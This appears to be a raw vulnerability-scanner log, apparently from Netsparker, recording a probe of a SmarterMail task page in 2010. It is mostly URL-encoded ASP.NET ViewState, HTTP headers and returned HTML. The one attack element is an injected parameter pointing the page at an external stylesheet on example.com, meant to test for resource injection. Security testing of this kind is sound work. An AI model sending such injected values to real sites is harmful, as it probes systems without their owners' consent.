kU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JHRpbWVWaWV3BSNjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dAUsY3RsMDAkTVBIJEVuZERhdGVQaWNrZXJfU2V0dGluZ1RleHQkY2FsZW5kYXIFLGN0bDAwJE1QSCRFbmREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBSxjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCR0aW1lVmlldwUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjIPMtwLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAtAQ2F0ZWdvcmllcwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAADUNhdGVnb3JpZXNUYWILZAUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjMPMt4LAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAxARGVzY3JpcHRpb24B9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAAA5EZXNjcmlwdGlvblRhYgtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMQ8y1gsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBEZXRhaWxzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtk9e1blg9ItMmce8gXf%2bTGvdVB1aA%3d&ctl00$MPH$ComboPercent_SettingDropDown=0&ctl00$MPH$ComboPriority_SettingDropDown=0&ctl00$MPH$ComboStatus_SettingDropDown=Not+Started&ctl00$MPH$DescriptionBox_SettingText=&ctl00$MPH$EndDatePicker_SettingText=2010-10-02-14-15-00&ctl00$MPH$EndDatePicker_SettingText$dateInput=2010-10-02-14-15-00&ctl00$MPH$ReminderDropDown_SettingDropDown=None&ctl00$MPH$StartDatePicker_SettingText=2010-10-02-13-15-00&ctl00$MPH$StartDatePicker_SettingText$dateInput=2010-10-02-13-15-00&ctl00$MPH$SubjectBox_SettingText=&ctl00$MPH$txtPassedMessageID=&ctl00$MPH$VisiblePage=ctl00_MPH_OptionsTab&ctl00$TPH$TabStrip$SelectedTab=ctl00_TPH_TabStrip_Tab1&ctl00_MPH_EndDatePicker_SettingText_calendar_AD=%5b%5b1900%2c1%2c1%5d%2c%5b2100%2c1%2c1%5d%2c%5b2010%2c10%2c2%5d%5d&ctl00_MPH_EndDatePicker_SettingText_calendar_SD=%5b%5d&ctl00_MPH_EndDatePicker_SettingText_ClientState=&ctl00_MPH_EndDatePicker_SettingText_dateInput_ClientState=&ctl00_MPH_EndDatePicker_SettingText_dateInput_text=10%2f2%2f2010+2%3a15+PM&ctl00_MPH_EndDatePicker_SettingText_timeView_ClientState=&ctl00_MPH_StartDatePicker_SettingText_calendar_AD=%5b%5b1900%2c1%2c1%5d%2c%5b2100%2c1%2c1%5d%2c%5b2010%2c10%2c2%5d%5d&ctl00_MPH_StartDatePicker_SettingText_calendar_SD=%5b%5d&ctl00_MPH_StartDatePicker_SettingText_ClientState=&ctl00_MPH_StartDatePicker_SettingText_dateInput_ClientState=&ctl00_MPH_StartDatePicker_SettingText_dateInput_text=10%2f2%2f2010+1%3a15+PM&..

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:12:07 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2563
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 11:45:44 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16496
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Tasks - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmTask.aspx?mapped=false&amp;user=dummy&amp;popup=true&amp;nsextt=%2f%2fexample.com%2fnetsparker0x006D10.css" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTA0NjI1MzI3DxYGHghfX19UaXRsZQUITXkgVGFza3MeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgwCAg9kFgICAQ8WAh4HVmlzaWJsZWhkAgMPZBYEAgEPZBYCAgUPDxYCHwNoZGQCAw9kFgICAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFD3dpbmRvdy5jbG9zZSgpO2RkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIDD2QWBgICD2QWAgIBD2QWDgIBDw8WAh8DaGQWBGYPDxYGHghDc3NDbGFzcwUMSW5kZW50IEZpeGVkHwcFDFJlbGF0ZWQgSXRlbR4EXyFTQgICZGQCAQ8PFgQfCAUIIFNldHRpbmcfCQICZGQCAg9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgRmDw8WEB4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeB01heERhdGUGAADbmXo/MQkfCQICHgxTZWxlY3RlZERhdGUGwPeK80owzUgfCAUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR4HTWluRGF0ZQYAQFcgUwVRCGQWCmYPFCsACA8WGB8KaB8LaB4NT3JpZ2luYWxWYWx1ZQUUMTAvMi8yMDEwIDE6MTU6MDAgUE0eDEF1dG9Qb3N0QmFja2ceCkRhdGVGb3JtYXQFAWceEURpc3BsYXlEYXRlRm9ybWF0BQFnHwcFEzIwMTAtMTAtMDItMTMtMTUtMDAeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8NBgAA25l6PzEJHwwFDFNtYXJ0ZXJUb29scx8PBgBAVyBTBVEIZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpSG92ZXIfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFEXJpVGV4dEJveCByaUVycm9yHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRNyaVRleHRCb3ggcmlGb2N1c2VkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRNyaVRleHRCb3ggcmlFbmFibGVkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpRW1wdHkfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFEHJpVGV4dEJveCByaVJlYWQfCQKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawVLcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9TdGFydERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwnY2FsJyk7ZAICDxQrAA0PFhwFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBQRGb2NEBgCAFOTbL80IBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBRFFbmFibGVNdWx0aVNlbGVjdGgFD1JlbmRlckludmlzaWJsZWcFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUETWluRAYAQFcgUwVRCAUDRVJTaAUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFEk5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1heEQGAADbmXo/MQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxVoZGQWBB8IBQtyY01haW5UYWJsZR8JAgIWBB8IBQxyY090aGVyTW9udGgfCQICZBYEHwgFCnJjU2VsZWN0ZWQfCQICZBYEHwgFCnJjRGlzYWJsZWQfCQICFgQfCAUMcmNPdXRPZlJhbmdlHwkCAhYEHwgFCXJjV2Vla2VuZB8JAgIWBB8IBQdyY0hvdmVyHwkCAhYEHwgFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8JAgIWBB8IBQlyY1ZpZXdTZWwfCQICZAIDDw8WBB8XBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYfGAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmFgIfGQVMcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9TdGFydERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwndGltZScpO2QCBA8UKwACDxYOHglTdGFydFRpbWUoKVxTeXN0ZW0uVGltZVNwYW4sIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQgwNzowMDowMB4HRW5kVGltZSgrBAgxOTowMDowMB4ISW50ZXJ2YWwoKwQIMDA6MTU6MDAfCmgfC2gfDAUMU21hcnRlclRvb2xzHxVoZBYEHwgFB3JjSG92ZXIfCQICFgJmDxQrAAkPFgYeDVJlcGVhdENvbHVtbnMCBB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCMGQWBB8IZR8JAgJkFgQfCGUfCQICZGQWBB8IBQhyY0hlYWRlch8JAgIWBB8IBQhyY0Zvb3Rlch8JAgIWBh8WGwAAAAAAQG9AAQAAAB8IBUlSYWRDYWxlbmRhclRpbWVWaWV3IFJhZENhbGVuZGFyVGltZVZpZXdfU21hcnRlclRvb2xzIFJhZENhbGVuZGFyVGltZVZpZXcgHwkCggIWYAIBD2QWAmYPFgIeCWlubmVyaHRtbAUHNzowMCBBTWQCAg9kFgJmDxYCHyAFBzc6MTUgQU1kAgMPZBYCZg8WAh8gBQc3OjMwIEFNZAIED2QWAmYPFgIfIAUHNzo0NSBBTWQCBQ9kFgJmDxYCHyAFBzg6MDAgQU1kAgYPZBYCZg8WAh8gBQc4OjE1IEFNZAIHD2QWAmYPFgIfIAUHODozMCBBTWQCCA9kFgJmDxYCHyAFBzg6NDUgQU1kAgkPZBYCZg8WAh8gBQc5OjAwIEFNZAIKD2QWAmYPFgIfIAUHOToxNSBBTWQCCw9kFgJmDxYCHyAFBzk6MzAgQU1kAgwPZBYCZg8WAh8gBQc5OjQ1IEFNZAIND2QWAmYPFgIfIAUIMTA6MDAgQU1kAg4PZBYCZg8WAh8gBQgxMDoxNSBBTWQCDw9kFgJmDxYCHyAFCDEwOjMwIEFNZAIQD2QWAmYPFgIfIAUIMTA6NDUgQU1kAhEPZBYCZg8WAh8gBQgxMTowMCBBTWQCEg9kFgJmDxYCHyAFCDExOjE1IEFNZAITD2QWAmYPFgIfIAUIMTE6MzAgQU1kAhQPZBYCZg8WAh8gBQgxMTo0NSBBTWQCFQ9kFgJmDxYCHyAFCDEyOjAwIFBNZAIWD2QWAmYPFgIfIAUIMTI6MTUgUE1kAhcPZBYCZg8WAh8gBQgxMjozMCBQTWQCGA9kFgJmDxYCHyAFCDEyOjQ1IFBNZAIZD2QWAmYPFgIfIAUHMTowMCBQTWQCGg9kFgJmDxYCHyAFBzE6MTUgUE1kAhsPZBYCZg8WAh8gBQcxOjMwIFBNZAIcD2QWAmYPFgIfIAUHMTo0NSBQTWQCHQ9kFgJmDxYCHyAFBzI6MDAgUE1kAh4PZBYCZg8WAh8gBQcyOjE1IFBNZAIfD2QWAmYPFgIfIAUHMjozMCBQTWQCIA9kFgJmDxYCHyAFBzI6NDUgUE1kAiEPZBYCZg8WAh8gBQczOjAwIFBNZAIiD2QWAmYPFgIfIAUHMzoxNSBQTWQCIw9kFgJmDxYCHyAFBzM6MzAgUE1kAiQPZBYCZg8WAh8gBQczOjQ1IFBNZAIlD2QWAmYPFgIfIAUHNDowMCBQTWQCJg9kFgJmDxYCHyAFBzQ6MTUgUE1kAicPZBYCZg8WAh8gBQc0OjMwIFBNZAIoD2QWAmYPFgIfIAUHNDo0NSBQTWQCKQ9kFgJmDxYCHyAFBzU6MDAgUE1kAioPZBYCZg8WAh8gBQc1OjE1IFBNZAIrD2QWAmYPFgIfIAUHNTozMCBQTWQCLA9kFgJmDxYCHyAFBzU6NDUgUE1kAi0PZBYCZg8WAh8gBQc2OjAwIFBNZAIuD2QWAmYPFgIfIAUHNjoxNSBQTWQCLw9kFgJmDxYCHyAFBzY6MzAgUE1kAjAPZBYCZg8WAh8gBQc2OjQ1IFBNZAIBDw8WAh8HBRExMC8yLzIwMTAgMToxNSBQTWRkAgMPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYEZg8PFhAfCmgfC2gfDAUMU21hcnRlclRvb2xzHw0GAADbmXo/MQkfCQICHw4GwF9PVVMwzUgfCAUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR8PBgBAVyBTBVEIZBYKZg8UKwAIDxYYHwpoHwtoHxAFFDEwLzIvMjAxMCAyOjE1OjAwIFBNHxFnHxIFAWcfEwUBZx8HBRMyMDEwLTEwLTAyLTE0LTE1LTAwHxQFB3JpTGFiZWwfFWgfDQYAANuZej8xCR8MBQxTbWFydGVyVG9vbHMfDwYAQFcgUwVRCGQWBh8WGwAAAAAAAFlABwAAAB8IBRFyaVRleHRCb3ggcmlIb3Zlch8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpRXJyb3IfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFE3JpVGV4dEJveCByaUZvY3VzZWQfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFE3JpVGV4dEJveCByaUVuYWJsZWQfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFFHJpVGV4dEJveCByaURpc2FibGVkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRFyaVRleHRCb3ggcmlFbXB0eR8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAUQcmlUZXh0Qm94IHJpUmVhZB8JAoICZAIBDw8WBB8XBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8YBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxkFSXJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCcpLCdjYWwnKTtkAgIPFCsADQ8WHAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAIAU5NsvzQgFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWI